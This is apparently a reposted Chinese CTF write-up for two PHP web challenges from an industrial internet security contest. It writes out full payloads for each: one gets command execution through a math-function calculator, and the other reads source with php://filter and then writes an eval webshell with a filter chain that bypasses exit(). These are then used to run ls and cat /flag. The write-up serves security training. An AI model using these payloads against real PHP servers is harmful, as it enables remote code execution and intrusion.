1000字范文,内容丰富有趣,学习的好帮手!
1000字范文 > 全国工业互联网安全技术技能大赛Web题WP

全国工业互联网安全技术技能大赛Web题WP

时间:2023-07-29 08:25:47

相关推荐

全国工业互联网安全技术技能大赛Web题WP

0x00 SimpleCalculator

打开后,发现flag.php可执行数学函数,在网上找到一个原题:/5211lyz/p/11588219.html

可执行shell拿到flag。

payload如下:

http://eci-1cei547jhyas2r4f5r2./flag.php?search=\$pi=(is_nan\^(6).(4)).(tan\^(1).(5));\$pi=\$\$pi;\$pi{0}(\$pi{1})&0=system&1=cat%20/flag。

0x01 easyphp

打开后发现是个文件包含的题目,可通过

http://eci-2zegsp1aou4jdyibk8km./index.php?page=php://filter/convert.base64-encode/resource=index.php

拿到源码:

他提示需要访问7fa3b767c460b54a2be4d49030b349c7.php,访问后,可以看到7fa3b767c460b54a2be4d49030b349c7.php的源码。

通过代码审计,可以看到最后一行代码content被exit()函数分隔,这是个绕过死亡exit的题目。而上述waf没有过滤掉zlib.inflate,因此可以构造payload写入shell。

http://eci-2zegsp1aou4jdyibk8km./7fa3b767c460b54a2be4d49030b349c7.php?content=?content=php://filter/write=string.strip_tags|zlib.inflate|%3f%3e%3c%3fphp+eval(%24_GET%5ba%5d)%3b%3f%3e%3c%3f/resource=shell.php

然后执行shell,发现flag文件。

http://eci-2zegsp1aou4jdyibk8km./7fa3b767c460b54a2be4d49030b349c7.php?content=shell.php&a= ls /

于是查看/flag,可获得flag。

http://eci-2zegsp1aou4jdyibk8km./7fa3b767c460b54a2be4d49030b349c7.php?content=shell.php&a= cat /flag

想学习更多网络安全的知识,可以关注公众号“SCLM安全团队”。

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。